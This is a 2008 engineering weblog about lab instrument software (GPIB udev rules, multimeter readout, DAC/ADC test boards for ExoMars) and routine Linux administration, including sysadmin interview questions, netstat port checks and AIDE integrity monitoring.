Weblog entries 2008

Comments on 2008-05-31 Test for a sysadmin

As part of an interview for a new system administration, we asked the following questions:

General:

  • Background?
  • With which Unix-like systems have you had experience?
  • How many machines or users?

Administration:

  • Which filesystem does Linux use?
  • What is journalling?
  • What's an inode?
  • What happens when you delete a file while an application has it opened?
  • What is: NFS? NIS?
  • What is Kerberos?
  • Which webserver do you have experience with?

Network:

  • Do you know what OSI layers are?
  • Where does TCP fit in?
  • What is ICMP? Where does it fit in?

Network above layer 4:

  • What is SMTP?
  • What's the difference between IMAP and POP3?
  • Why are both protocols insecure? How to handle this?
  • What's DNS?
  • Did you administrate DNS servers?
  • What does it mean when a server is authoritative for a domain?
  • How do you look up the name servers for a domain?
  • What are virtual hosts in the HTTP protocol?

Network layer 4 and below:

  • What's the difference between UDP and TCP?
  • What's a gateway?
  • What's a multi-homed machine?
  • If there are two network interfaces on a machine, how many IP addresses can you use?

Security:

  • How do you check for open ports?
  • What is jailing?
  • What is selinux?
  • When is a firewall called for, in your opinion?
  • How would you go about setting up a firewall?
  • What is intrusion detection?

-- Anonymous 2008-05-31 10:40 UTC

2008-12-19 Linux USB device handling

For reading/operating lab instruments like multimeters and power supplies, the GPIB standard is used. This standard defines the type of cabling and connection.

However nowadays the interface cards for this type of card are awkward to get and are replaced by an USB-based GPIB adapter like this one:

http://sine.ni.com/images/products/us/050318_gpib_usb_l.jpg

In this weblog entry, I'm going to explain the situation where you have a Linux machine and a USB device, but as an application developer you don't know how to continue from here. This is all explained using a USB-based GPIB adapter.

These particular devices are handled on Linux using the default gpib_common.ko kernel module and a device-specific driver which the manufacturer distributes (in this case the ni_usb_gpib.ko module).

However that's not the end of it. When the device is plugged in, it has to be connected to a device file like /dev/gpib0. This is done by loading the modules, loading the firmware (with some particular devices), running the gpib_config utility and setting the correct permissions on the device file.

We want this done automatically on our Debian machines. We already have compiled and repackaged the gpib_common.ko and ni_usb_gpib.ko modules, and have installed these.

First we need to know if the module will be loaded when we connect the device. The kernel handles loading appropriate modules by calling modprobe. Typing the following command can tell you whether modprobe knows what to do when such a device is connected. Replace the 'grep gpib' with 'less' if you don't know what string you're looking for.

 $ modprobe -c | grep gpib

If that's fine, then connecting the device should load the modules. Type the following command to check this, again replacing the 'grep gpib' with something more appropriate:

 $ lsmod | grep gpib

Connect the device and check for changes. If a device driver is loaded, then a udev rule should be written. If not, re-examine the output of the modprobe -c command. An example extract:

 $  modprobe -c | grep gpib
 ...
 alias usb:v3923p702Ad*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
 alias usb:v3923p709Bd*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
 ...

Observing one of those lines a bit closer:

 alias usb:v3923p702Ad*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
            ^^^^ ^^^^
 The vendor ID    The product ID

In my case, no driver got loaded, because the vendor and product numbers that are outputted by modprobe don't match with the USB device its vendor and product number.

To see what the vendor and product numbers of the USB device are, type:

 $ lsusb
 ...
 Bus 007 Device 003: ID 3923:702b National Instruments Corp.
 ...

Check the string 1234:5678 just before the name of the device. The first part is the vendor number, the second part is the product number, both hexadecimal. As you can see, in this case the vendor number matches, but not the product number.

Add a new file in /etc/modprobe.d and then add a line in there which looks like the lines in the existing modprobe configuration. Adapt the vendor and product numbers as necessary. Then type lsmod and connect your device. Type lsmod again to see whether the appropriate driver loaded. If not, did you make a typo in the vendor or product numbers?

Now that the driver is loaded, we go on to writing udev rules. Check the Writing udev rules document for this.

Some tips for writing udev rules follow.

First you find the device details using:

 $ find /sys -name dev  | grep usb

Find the device its path in /sys and use it with udevinfo. Note that some devices require firmware to be loaded. udevinfo then will not show a lot of information. The device must then be identified purely by its product and vendor ID.

 $ udevinfo -a -p /sys/class/usb_device/usbdev2.18/dev

Before you plug/unplug the device, run the udev monitor to see what events are fired off:

 $ udevmonitor

To test whether your rule fires off, use logger in your udev rule:

 SUBSYSTEM=="usb", DRIVERS=="usb", ATTRS{idVendor}=="3923",
   ATTRS{idProduct}=="709b", ACTION=="add",
   RUN+="/usr/bin/logger My rule fires off!"

Note that the above line is actually ONE line, without any linefeeds except at the end.

When you want to load firmware upon connecting the USB device, you might need to pass the location of the device to the firmware loader. It's possible to use the value of sysfs attributes in your RUN or PROGRAM part of the udev rule:

 SUBSYSTEM=="usb", DRIVERS=="usb", ATTRS{idVendor}=="3923",
   ATTRS{idProduct}=="702b", ACTION=="add",
   RUN+="/usr/bin/logger Running /usr/sbin/gpib_config for device
   USB-GPIB-B on bus %s{busnum}, device %s{devnum}"

The %s{...} is substituted for a particular sysfs attribute its value.

2008-12-09 Offset dependency

Previous year, I wrote about the Fiske steps routine, a routine which automatically searches for an optimum sensor setting.

For this routine to work, the setting and reading back of voltages and currents has to be very precise. Thus, a 'measure offsets' routine was also developed, but it turns out this routine is going to be a bit more complicated than expected.

Here's an image of the output of the Fiske steps routine:
fiske example.png

We had a hard time today getting the routine to work nicely. The physics student told us that it has something to do with the fact that the FFO voltage depends in the first place on the FFO bias current, but also in a much lesser way on the FFO control line.

Some background about this. The sensor behaves as a resistor, thus when setting a particular FFO bias current, the resulting FFO voltage has a direct relation. This relation becomes somewhat less simple when the FFO control line is set. This control line has two influences: running a current creates a magnetic field, and because the copper line at the back of the sensor substrate acts as a resistor, a little heat is given off.

The heating makes the offset somewhat different, and should be taken into account. Also, there's timing involved; setting the FFO CL to zero after a high setting, the FFO voltage can be seen slowly dropping from near zero to zero.

2008-11-21 Temperature sensor versus PT1000

One of the tests we do on the temperature sensing ASIC is to measure the difference between the device and a PT1000.

A number of samples is taken from both and then on the resulting two arrays, we do a first-order fit. The offset should be 0 and the gain should be 1 otherwise an error has crept into either. For each ASIC sample, we repeat this procedure.

2008-11-04 Bitstream mode

The new project its temperature sensor (tsens) ASIC is basically a Delta Sigma analog-to-digital converter. What it basically comes down to, is that the ASIC measures temperature differences as a 1-bit value. Through calculations, a temperature comes out but that raw 1-bit value can still be read for verification purposes.

For the coming radiation test, we'll read out lots of things and among them we will be reading out the raw stream of bits.

The FPGA needs to be set in a particular mode for this:

  • Set the drdy_select register to the appropriate socket (the board is outfitted with two sockets, to test two ASICs)
  • Make the buffer for the bitstream empty by setting the buffer_flush register to 1
  • Set the sequencer_mode register to 2, which means bitstream mode
  • Set the buffer_pktsize register to 4, which means that we want four 32-bit words when we read out the buffer
  • Set the bs_mode register to the appropriate socket which starts the measurement

When this is done, the register buffer_read needs to be read out regularly to make sure the buffer doesn't overflow. The command to read out the buffer can now contain four 32-bit words.

Now it's a given that the time for measurements after radiation is very short since the samples can't be out of the radiation too long (otherwise you invalidate the test). Thus we have 60 seconds to do a measurement.

Read 64 seconds, get 8222 bits per readout, you'll get 16444 32-bit words.
Each seconds, for 0.1 second a measurement is done of 8222 bits.
The rest of the second, the tsensor stops measuring and we can read out the buffer. With a buffer packet size of four 32-bits words means 4111 times reading out 128 bits.

A nice thing about the buffer is that it's so big: a whole whopping megabyte is reserved just for the bitstream that comes out of the temperature sensor. If you don't want to disturb the process with communications from the PC, then just let the buffer fill up, wait for a minute and retrieve the whole buffer in one fell swoop.

2008-10-17 adding a logfile

My thought was; adding a logfile to our software within half an hour should be doable. So let's give it a shot!

The server has a debug macro. So obviously it'd be easiest to add it there. The macro expands to a call to a singleton, which emits a Qt signal. It's caught by a class which, amongst others, writes this stuff to the screen.

That was the first idea, but it turns out someone already made a start using syslog. Before the signal is emitted, I also added a line to write it to syslog.

Update: turns out that's a little shortsighted. I'd like to coin a new law that states that there's always more work involved than you think:

  • Removing useless stuff like date/timestamp, which is added by syslog
  • Mapping our internal log levels to the syslog priority levels

2008-10-16 analyzing a running process

Today I was notified that our custom-developed lab software suite had crashed.

Having a look, it turns out that it hadn't crashed, but using top showed in fact that it was using 100% CPU time.

First I did an strace on the process, which showed hundreds of lines looking like:

 clock_gettime(CLOCK_MONOTONIC, {836478, 309454188}) = 0
 clock_gettime(CLOCK_MONOTONIC, {836478, 311665927}) = 0
 clock_gettime(CLOCK_MONOTONIC, {836478, 313925541}) = 0

Then I decided to get a stacktrace from the process using gdb:

 labbox1:~$ gdb --pid=17732
 (gdb) bt
 #0  0xb75b3e5d in memset () from /lib/tls/libc.so.6
 #1  0x084dad4a in QTextEngine::LayoutData::reallocate ()
 #2  0x084de989 in QTextEngine::attributes ()
 #3  0x084e8c33 in QTextLine::layout_helper ()
 #4  0x084ea124 in QTextLine::setLineWidth ()
 #5  0x085211e5 in QTextDocumentLayoutPrivate::layoutBlock ()
 #6  0x08527825 in QTextDocumentLayoutPrivate::layoutFlow ()
 #7  0x0852544f in QTextDocumentLayoutPrivate::layoutFrame ()
 #8  0x08525910 in QTextDocumentLayoutPrivate::layoutFrame ()
 #9  0x08525b6c in QTextDocumentLayout::doLayout ()
 #10 0x08525c10 in QTextDocumentLayoutPrivate::ensureLayoutedByPosition ()
 #11 0x08525c98 in QTextDocumentLayout::blockBoundingRect ()
 #12 0x0852ccb6 in QTextCursorPrivate::blockLayout ()
 #13 0x0852ea62 in QTextCursorPrivate::setX ()
 #14 0x0853289d in QTextCursor::deleteChar ()
 #15 0x080b7fe8 in ScriptWindow::showOutput () at src/Debug.cpp:50
 #16 0x080b846f in ScriptWindow::runOutput () at src/Debug.cpp:50
 #17 0x0810afd9 in ScriptWindow::qt_metacall (this=0x8fcc560,
     _c=QMetaObject::InvokeMetaMethod, _id=48, _a=0xbfd419c8)
     at src/moc_Windows.cpp:248
 #18 0x08a14892 in QMetaObject::activate ()
 #19 0x08a14f54 in QMetaObject::activate ()
 #20 0x089a4786 in QProcess::readyReadStandardOutput ()
 #21 0x089a94db in QProcessPrivate::_q_canReadStandardOutput ()
 #22 0x089a997e in QProcess::qt_metacall ()
 #23 0x08a14892 in QMetaObject::activate ()
 #24 0x08a14f54 in QMetaObject::activate ()
 #25 0x08a31b61 in QSocketNotifier::activated ()
 #26 0x08a1a90f in QSocketNotifier::event ()
 #27 0x0832426f in QApplicationPrivate::notify_helper ()
 #28 0x083296b9 in QApplication::notify ()
 #29 0x08a00097 in QCoreApplication::notifyInternal ()
 #30 0x08a258dd in socketNotifierSourceDispatch ()
 #31 0xb78c1731 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
 #32 0xb78c47a6 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
 #33 0xb78c4d27 in g_main_context_iteration () from /usr/lib/libglib-2.0.so.0
 #34 0x08a25a38 in QEventDispatcherGlib::processEvents ()
 #35 0x083a9665 in QGuiEventDispatcherGlib::processEvents ()
 #36 0x089ff0fd in QEventLoop::processEvents ()
 #37 0x089ff37d in QEventLoop::exec ()
 #38 0x08a014e2 in QCoreApplication::exec ()
 #39 0x083249d7 in QApplication::exec ()
 #40 0x0805d809 in main ()

After the weekend, we'll analyze this at our leisure but if anyone has helpful comments, let me know.

Update: today I saw that Debian Package of the Day highlighted memstat which is a tool displaying virtual memory usage. Pity I didn't know this earlier, since it looks really useful.

2008-10-09 Reading out a multimeter part 2

Again busy with the HP 8345A multimeter. The electronics guy suspected that the default settings were actually getting more accurate measurements than our scripts were getting.

The default settings are:

 NPLC 10.000000
 FUNC 1, .1
 APER 0.200000
 RES -1.000000
 LINE 49.985386
 NRDGS 1, 1
 RANGE .1

The above are all functions that influence the measurement accuracy. Some seem to confirm eachother, for instance the NPLC (Number of Power Line Cycles) says that we take one measurement every 10 power cycles (which is 50 Hz, like the LINE setting says), i.e. 1 sample per 0.2 seconds. That's exactly what the APERture setting displays.

Then we have the RANGE setting of 0.1 volts, which is what the second result of the FUNC setting says. So that's good too. What's funny though, is the result of the RESolution setting which returns a negative number. Will look into that later.

After talking to our electronics guy, he mentioned that -- yes he could pass these settings to the script but something still was wrong. After the script ended, the multimeter would display a faster measurement than before the script.

The problem here is that we end the script with the PRESET NORM command. The PRESET command can set the multimeter in three predefined states. Useful since you have something to turn back to. Unfortunately, the state after power-on isn't predefined. Turns out that's a separate command, the RESET command. OK, so that's fixed.

Next problem: when any script ends, the panel of the multimeter is locked out. Not even the RESET command fixes that. Turns out that's pretty easy: the Unlock button at the front of the meter.

After that another problem crops up: from the ten measurements I get back a variable number of them, anywhere between zero to seven. It probably has something to do with the way the EOI setting is done.

This was not fixable by using the EOI setting although it seemed that way for a while. In this case I found the problem (but not the cause) by sending the ERRSTR? command, where the error was TRIGGER TOO FAST.

The manual says here that the interval from one reading to the next is specified by the SWEEP command. Funny thing is, when an aperture of 0.2 seconds is set, with say 10 points then an interval time of somewhat more than two seconds should be enough. But when such a setting is made, the measurement takes up to 20 seconds and no values are actually returned.

I reverted the EOI setting back to 0 and now all the requested measurements are returned. The error TRIGGER TOO FAST still is returned though, and I don't trust the measurements as a consequence. As a workaround, we're now doing one measurement point, which doesn't trigger the error.

Update: after looking at this with a colleague, the issue turns out to be the following. There are two ways to end reading; through a character such as \n (line feed character), or through setting the EOI line high. The first way was being used incorrectly. This caused measurements to be returned while reading simple commands like 'ERRSTR?'. Now that was fixed, simple commands like ERRSTR? were working.

However, it stops working for cases when you request reading in binary format. That format might include that particular character and that's what was causing the early termination of readings.

That's all fine and dandy, but we don't want ASCII transmission of measurements -- we need the binary format since that makes the measurements faster. Roughly, taking a two-second measurement will take six seconds when taking the ASCII route.

This could be fixed by using the EOI line for binary readings. The command END can take care of this; requesting END? results in setting 2. This means: for multiple readings, the EOI line is set true when all measurements have been sent.

Combined this can work as follows:

  1. Open the GPIB device, set the EOS (End-Of-String) to \n
  2. Do some initialization
  3. Before requesting multiple measurements, disable the termination of reads when receiving the EOS (instead rely on the EOI line set high)
  4. After receiving the measurements, enable the EOS again and continue on merry way

Update 2: in the end, we fixed it another way. Instead of letting the read call stop automatically when an EOS character comes by, we just calculate the number of bytes to read. Then do a read call exactly for those. After eliminating the SWEEP command, we also eliminated the TRIGGER TOO FAST error! Hurray!

Also found out that the RES (resolution) setting returns -1 because it's determined automatically from the NPLC setting.

2008-10-03 Software architecture decisions

Today I bumped into a problem which required some decisions about the software. In short it comes down to the following.

We have control scripts (in Perl) which fire off Command Packets to the server. The server is connected to multiple daemons which handle tasks. When receiving a Command Packet, the server broadcasts it to all daemons.

When the daemon replies with a Response Packet, the server broadcasts these to all connected scripts.

Problem is, that broadcast isn't always useful. There could be multiple scripts, giving off commands, and these are all broadcasted. Thus it could be that scripts receive the wrong answer.

Now a solution for this:

  • Create a special packet
  • Eliminate the first broadcast for the new packets
  • Eliminate the second (response) broadcast for the new packets

After some hacking, what remains is the return packet. It shouldn't be broadcasted but the tree of classes seems to point to itself again. Could this be the Friday evening effect?!

Update: partly, it was the Friday evening effect. What was happening is that the return packet is not broadcasted, but instead is neatly redirected back to the sending Connection object.

Currently the Perl library uses a number within the packet to determine what to do with it, the APID (APplication IDentification). However this APID is separated in two types; a hardware and a software APID. The packets with a hardware APID are passed by the daemons straight to the connected hardware, and it's currently used for a binary data, not ASCII. The software APID is unique per daemon. Thus sending a packet needs to include the daemon its software APID.

New planning:

  • Include the software APID when sending packets from the Perl scripts
  • When the response is sent from the daemon, the software APID needs to be set in the response packet.
  • When the response is received in the Perl library, we need to know that when a software APID is present, the packet contents need to be treated in another way

Some important things to remember about this architecture:

  • There is not one single place which maps a particular request to a particular response -- thus it's possible to send packets with one APID, and have the response contain another
  • It's implicit that a request packet triggers a broadcasted response
  • When something else than a hardware APID is sent, the server assumes the packet is meant for the server itself
  • A packet for the server is in the form of two integers, a command and a value (an example of this is the setting of timeouts)

2008-09-22 Reading out a multimeter

We'd like to test the DAC board by reading it out with an HP 3458A multimeter (now Agilent, but this is a pre-spinoff model). It's attached through a GPIB interface with the PC we're running our software on.

hp 3458a.jpg

Currently, we've got some Perl scripts that were used in a previous project however we want long integration times for accurate measurements. The currently used Perl code doesn't allow this.

The current situation is as follows. The multimeter has a trigger arm event (command TARM),,a trigger event (command TRIG) and a sample event (several commands). Normally, all are set to AUTO and the display of the meter shows continuously updating readings. The current code sets TRIG to SYN, which means 'make a reading when GPIB commands you to do so'. Then it does some other setup and before making a reading, sets TRIG to SGL, which means 'do one measurement then disable readings'.

The resolution is set more or less automatically because a range is passed (1.2V) when selecting DV voltage measurement. The SWEEP command is then used to take any number of samples.

But now we want to have long sampling times.

The existing solution was to set the APER command (aperture), which has a value between 0 and 1 seconds, specified in 100ns steps.

Since we wanted longer measurement times, we'd use the NPLC command. NPLC stands for 'Number of Power Line Cycles'. This is useful since measuring for a whole cycle will reduce noise from the incoming power line.

In The Netherlands, the power from the wall socket has a frequency of 50 Hz. Thus if we want to measure for 100 cycles, we'd measure for two seconds.

Funny thing is, that's not what the script does. There are a number of set-up steps before the measurement is taken and I'd like to eliminate those (or at least, move them to the initialization phase).

There's for instance the RATIO command, which is set to OFF. This command measures both your signal and a reference voltage, then returns the division of those. We don't need this and the default setting is OFF. So I eliminated this command from the script.

To find out whether the ratio setting really defaulted to 0, I tried to read the setting from the multimeter. This worked, but besides the setting I received a load of garbage as well. I'd like to find out why that happens.

2008-09-16 Tweaking TCP

For the Telis project, we use the TCP protocol for the radio uplink. This is rather unusual since most other balloon flight projects use UDP and use their own retransmission and sequencing algorithms.

It has worked well for us previously, but we want to have more insight and diagnostics in a flight situation. Also, there's a backup function present in the software that's running on the PC104 on the balloon. Normally, it's not switched on and we'd like to automatically switch it on when a transmission occurs.

To gain more insight in the quality of the radio uplink, we think iptraf will do fine. A screenshot with the detailed statistics for an interface:

 - Statistics for eth0 ---------------------------
                Total      Total    Incoming   Incoming    Outgoing   Outgoing
              Packets      Bytes     Packets      Bytes     Packets      Bytes
  Total:         3142     621643        1665     131825        1477     489818
  IP:            3142     577645        1665     108505        1477     469140
  TCP:           2903     548408        1434      79900        1469     468508
  UDP:            238      29201         230      28569           8        632
  ICMP:             0          0           0          0           0          0
  Other IP:         1         36           1         36           0          0
  Non-IP:           0          0           0          0           0          0
  Total rates:         51.7 kbits/sec        Broadcast packets:          222
                       30.4 packets/sec      Broadcast bytes:          31189
  Incoming rates:       9.2 kbits/sec
                       15.8 packets/sec
                                             IP checksum errors:           0
  Outgoing rates:      42.5 kbits/sec
                       14.6 packets/sec

Note the IP checksum errors. This one would be pretty interesting for us.

Now what we probably also want, is a way to find out how many resends will occur if the radio uplink fails temporarily. We'd probably want to be gentle and not resend too much since the uplink is pretty limited bandwidth-wise. I have found a way to check this per application (man tcp, search for TCP_INFO) but not per interface.

A nice thing to use for testing purposes is Netem, the Linux in-kernel packet mangling software.

2008-08-29 Fighting an ADC

We use an ADC from Cirrus Logic on the DAC board. It's there to check the requirements for noise and linearity of the DAC (and subDACs).

It's the same ADC that we used in the Telis project. It's a nice piece of work, very accurate. For Telis it was used to measure in the hundreds of nanovolts.

dac board adc.jpg

On the DAC board however, there seem to be problems with linearity. Around zero volts, it seems to jump up and down a little. It wasn't just this sample; the ADC was lifted off the board and replaced with another -- the same problem was seen.

The gain on the ADC was lowered and the effect was still seen in the same way, so it's not the DAC that's causing the trouble. This indicates that the ADC or its placement on the board is the problem.

It's probably that last thing since with Telis it worked wonderfully, but that isn't conclusive because back then, the voltage around zero was looked at, but not very carefully.

What we'll now do is firstly use external measurement equipment and secondly, fire off an e-mail to Cirrus Logic support.

Another problem is that the ADC now gives off some REAL funny numbers after some changes in the FPGA. After a full day of analysis with three people (software engineer, FPGA engineer and analogue designer), we come to the conclusion that... the power must be shut down. You'll ask why wasn't this done right away. We did -- except the command that powers off the digital and analogue parts of the board do NOT affect the power of the ADC... That was one of the requirements.

However it remains to be seen whether this fixes the problem of non-linearity around zero.

2008-08-12 Configuring an ADC

On the DAC board, for testing purposes, a Cirrus Logic ADC is present.

It's the same ADC as used in another project. These babies are pretty well-versed feature-wise, as far as my experience goes anyway. The one we use (CS5534) has four channels, each of them with its own configuration registers for selecting measurement time, range selection, offset enablers, offset registers, et cetera.

What's different here is the FPGA in between the software and the ADC. In the previous project, I'd just write the configuration register for a certain voltage range and kick off a macro contained in the FPGA flash. Read back results and voilĂ .

Occasionally, I'd do those detailed steps in a script and the steps would be:

  • Set voltage range
  • Set measurement time
  • Wait for results
  • Read back results and convert

Currently, it's a bit simpler: just read out and convert.

2008-08-07 Controlling individual DACs

I've written previously about the DAC board, but mainly looking at it as a black box. This time it's time to look at the inner workings.

We perform two tests on the DAC, noise measurements and linearity. The complete range of the DAC is actually covered by five small DACs inside the package, which have a 7-bit range. Although normally we just control the main DAC and let the FPGA/DAC combo figure out what happens next, when the noise and/or linearity tests don't measure up to expectations, we need to look further.

That's why there's a special override register that can be enabled (set to 1) which allows us to control the five small DACs directly. This is done through two 32-bit registers, in a kind of funny way:

First register, called testd1, holds bits 19 to 0 in the table below. Register testd2 holds bits 34 to 20. The highest bit is the most significant bit (MSB).

bit meaning
34Bit 7 (MSB), DAC 1
33Bit 7 (MSB), DAC 2
32Bit 7 (MSB), DAC 3
31Bit 7 (MSB), DAC 4
30Bit 7 (MSB), DAC 5
29Bit 6, DAC 1
28Bit 6, DAC 2
27Bit 6, DAC 3
26Bit 6, DAC 4
25Bit 6, DAC 5
24Bit 5, DAC 1
23Bit 5, DAC 2
22Bit 5, DAC 3
21Bit 5, DAC 4
20Bit 5, DAC 5
......
......
1Bit 1 (LSB), DAC 4
0Bit 1 (LSB), DAC 5

Et cetera. Note the interleaving of bits. Since testers use scripts for this, we need to create a simple function which makes it easy to control the DACs separately.

In the end, I created a function which does the following:

  • Retrieves the current registers
  • Turns the user-requested value into a binary string of ones and zeroes
  • For each bit of the new value the registers are updated
  • When done, the registers are written and activated

2008-07-01 testing temperatures

Today I configured the housekeeping feature of our Generic EGSE software (stands for Electrical Ground Support Equipment) and added a couple of temperature sensors from the DAC board. I then configured the software to plot the requested values over time; see below.

temp dac.png

Then we sprayed the sensor with Cold Spray and watched the strip chart dive:

temp dac2.png

Time to show our setup:

IMAGE 497.jpg

2008-06-26 Layout Shamroc board

Below are details of the Shamroc DAC testing board.

IMAGE 496.jpg

  1. Daughterboard, for DAC 1 (DAC not present yet)
  2. Daughterboard, for DAC 2 (daughterboard not present yet)
  3. Filtering, plus the high-accuracy ADC is here as well (which measures back whatever the DACs set)
  4. Reference power
  5. Controlling of heaters
  6. Two housekeeping ADCs, with lower accuracy than the one that's located at 3
  7. Power for DACs and filtering
  8. Power supplies
  9. Additional input for power
  10. Barrier
  11. Additional clock input for DACs
  12. Connection from FPGA
  13. Connection from FPGA for the DAC clock signal (40 MHz)
  14. Output DACs
  15. Output reference power

Interesting stuff:

  • If the clock coming from the FPGA won't live up to our expectations during testing, we can use another source and hang it on the connectors marked by 11.
  • The clock from the FGPA is slightly set apart from the bigger data connection, because the harmonics from that 40 MHz signal have a higher chance of interfering with the data lines. Note that at a later time, we'll have a 1 Hz synchronization pulse coming in from outside. This is because our electronics are only part of the whole system and there must be a system-wide clock as well. Otherwise our clocks would deviate as time progresses (think days here).
  • There's another clock coming in at 1.25 MHz for the housekeeping ADCs, on the wide ribbon.
  • The input marked with 9 is there to test the stability of the DACs. We can feed in funny signals and this shouldn't influence the output of the DACs, marked with 14.

2008-06-23 Shamroc DAC board

The DAC testboard for the Shamroc (part of Exomars) project is now under test. This board is meant to test the extremely stable DACs that the project needs. The stability is necessary because the DACs will control the seismometer, which in turn needs very long measurement times. The accuracy of the DACs will thus directly influence the measurements.

Here is a good presentation on the seismometer itself: 9_Smit_GEP-SEIS.pdf

The image below is the test configuration of the seismometer.

seis.jpg

After reading the documentation, I personally was left with a bunch of questions. An appointment tomorrow will change all that.

Questions from a software engineer:

  • What is meant by 'very broad band' seismometers?
  • What is meant by 'seismometers in opposite sensing directions'? Is there a direct relation between the number of ADCs and sensing directions? If so, don't these ADCs have channels for that?
  • Does the GEP-Sphere (the package with the seismometers) contain everything for all directions? How many sensing directions are there?
  • How is the sensitivity compared to earth models?
  • Why is the instrument noise dominated by electronic noise?
  • How should the performance requirements be read?
  • Explanation of the subsystems in the ASIC
  • Why are commercial 24-bits ADCs not really 24 bits? Are we just measuring noise on those highest-accuracy bits? Why? Couldn't we cool it?
  • Why is 1/f elecronic noise (pink noise) the biggest problem?

Update following soon.

2008-06-19 Project SHAMROC

For project SHAMROC, part of the Exomars mission, the testing will start next week.

shamroc dac bord.jpg

This project develops mixed-signal ASICs which have DAC, ADC and temperature sensing functions and the first prototypes will arrive next week. I say prototypes, plural, since the functions are divided onto several ASICs for now. Later, these functions will be integrated on a single die.

This is exciting stuff. These electronics have to conform to the highest demands. Since we're talking about a Mars mission, the ASICs will have be operating in extreme temperatures. The weight has to be the lowest possible, and the limits on energy consumption forces us to use the minimum amount of components. And because of the conditions of the trip, as well as Mars conditions, the components have to be radiation-hard.

When the ASICs arrive, the software group has a generic workbench for testing them. We'll then work together with the electronics guys to make solid, reproducible tests.

2008-05-31 Test for a sysadmin

As part of an interview for a new system administration, we asked the following questions:

General:

  • Background?
  • With which Unix-like systems have you had experience?
  • How many machines or users?
  • Can you name some control panels? Which one have you supported?

Administration:

  • Which filesystem does Linux use?
  • What is journalling?
  • What's an inode?
  • What happens when you delete a file while an application has it opened?
  • What is: NFS? NIS?
  • What is Kerberos?
  • Which webserver do you have experience with?
  • What is a wildcard DNS entry? How would you configure Apache for that?

Network:

  • Do you know how to tunnel traffic?
  • Do you know what OSI layers are?
  • Where does TCP fit in?
  • What is ICMP? Where does it fit in?

Network above layer 4:

  • What is SMTP?
  • What's the difference between IMAP and POP3?
  • Why are both protocols insecure? How to handle this?
  • What's DNS?
  • Did you administrate DNS servers?
  • What does it mean when a server is authoritative for a domain?
  • How do you look up the name servers for a domain?
  • What are virtual hosts in the HTTP protocol?

Network layer 4 and below:

  • What's the difference between UDP and TCP?
  • What's a gateway?
  • What's a multi-homed machine?
  • If there are two network interfaces on a machine, how many IP addresses can you use?

Security:

  • How do you stay up-to-date on security news?
  • How do you check for open ports?
  • What is jailing?
  • What is selinux?
  • When is a firewall called for, in your opinion?
  • How would you go about setting up a firewall?
  • What is intrusion detection?

2008-05-25 Finding open ports

When tightening up security on a Linux server, one of the first things the system administrator does, is find out which ports are open. In other words, which applications are listening on a port that is reachable from the network and/or internet.

We'll use netstat for this purpose. On a prompt, type:

  $ sudo netstat --tcp --listen -p

Overview of the options:

--tcp Show applications that use the TCP protocol (exclude UDP)
--listen Show only applications that listen, and exclude clients
-p Show the process ID and name of the application to which the port belongs

Netstat sometimes pauses during output. This is normal; it tries to resolve the addresses into human readable host names*. If you don't want this, use the -n option.

Example output from my laptop which runs Fedora 8 (I have removed the columns Foreign Address and State for the sake of brevity):

 Active Internet connections (only servers)
 Proto Recv-Q Send-Q Local Address                PID/Program name   
 tcp        0      0 telislt.sron.nl:irdmi        2381/nasd           
 tcp        0      0 *:55428                      1965/rpc.statd      
 tcp        0      0 telislt.sron.:commplex-main  6573/ssh            
 tcp        0      0 *:mysql                      2307/mysqld         
 tcp        0      0 *:sunrpc                     1945/rpcbind        
 tcp        0      0 192.168.122.1:domain         2533/dnsmasq        
 tcp        0      0 telislt.sron.nl:privoxy      3581/ssh            
 tcp        0      0 telislt.sron.nl:ipp          2553/cupsd          
 tcp        0      0 telislt.sron.nl:smtp         2352/sendmail: acce 
 tcp        0      0 *:8730                       6030/skype          
 tcp        0      0 *:http                       2371/httpd          
 tcp        0      0 localhost6.localdom:privoxy  3581/ssh            
 tcp        0      0 *:ssh                        2205/sshd

Whenever there is an asterisk (star) instead of a host name, netstat tells us that the port is listened to on ALL interfaces, not only the local interface but also any present interfaces connected to the outside world. These are the ones we want to hunt down.

Now we know the program names, we can find out more about them. We'll take for instance the rpc.statd program. First we locate the complete path of this process:

 $ whereis rpc.statd
 rpc: /sbin/rpc.statd /usr/sbin/rpc.svcgssd /usr/sbin/rpc.idmapd 
 /usr/sbin/rpc.mountd /usr/sbin/rpc.rquotad /usr/sbin/rpc.gssd 
 /usr/sbin/rpc.nfsd /etc/rpc /usr/include/rpc

Whereis does a search and finds /sbin/rpc.statd. On RPM-based systems, we can request more information about the owning package:

 $ rpm -qif /sbin/rpc.statd
 ....
 The nfs-utils package provides a daemon for the kernel NFS server and
 related tools, which provides a much higher level of performance than the
 traditional Linux NFS server used by most users.

Now we know whether we want this package or not. If not, just remove it and the port will be closed. If we need the functionality, does it need to listen to the outside network? If not, we would typically Read The Fine Manual to see whether we can configure this package to listen locally.

Repeating this exercise for each line in the netstat output will tighten a server its security.

  • Just like addresses are resolved into host names, the port numbers are resolved into services using the /etc/services file.

2008-05-22 Configuring AIDE

Today I installed AIDE on a CentOS 5 server. This package is an alternative to the traditional Tripwire. The installation is done in a cinch with yum:

 $ sudo yum -y install aide

The first thing that happened, was that this server had SElinux disabled. So I had to make the following changes to the supplied configuration file /etc/aide.conf

I added the following lines close to the top; these are copies of default rules but without the selinux checks (which would otherwise generate errors):

 R =            p+i+n+u+g+s+m+c+acl+xattrs+md5
 L =            p+i+n+u+g+acl+xattrs
 > =            p+u+g+i+n+S+acl+xattrs
 DIR = p+i+n+u+g+acl+selinux+xattrs
 PERMS = p+i+u+g+acl

Then as root, initialize the database:

 $ sudo aide --init
 AIDE, version 0.13.1
 ### AIDE database at /var/lib/aide/aide.db.new.gz initialized.

Copy the new database, to make it the baseline to check against:

 $ sudo cp /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz 

Then create a file named aidecheck in /etc/cron.daily with the following contents:

 #!/bin/sh
 /bin/nice -n 18 /usr/sbin/aide --update | \
    /bin/mail -s "AIDE check on host  `hostname`" root
 cp /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz

Be sure to make the file executable:

 $ sudo chmod 755 /etc/cron.daily/aidecheck

2008-05-21 Code review

I'm doing a code review for our partner in the current project. In a recent
integration test, we found a problem.

An overview of the equipment. We're talking about software running on a
PC104 device (basically a small PC) running Linux. This PC104 has a bunch of
serial ports.

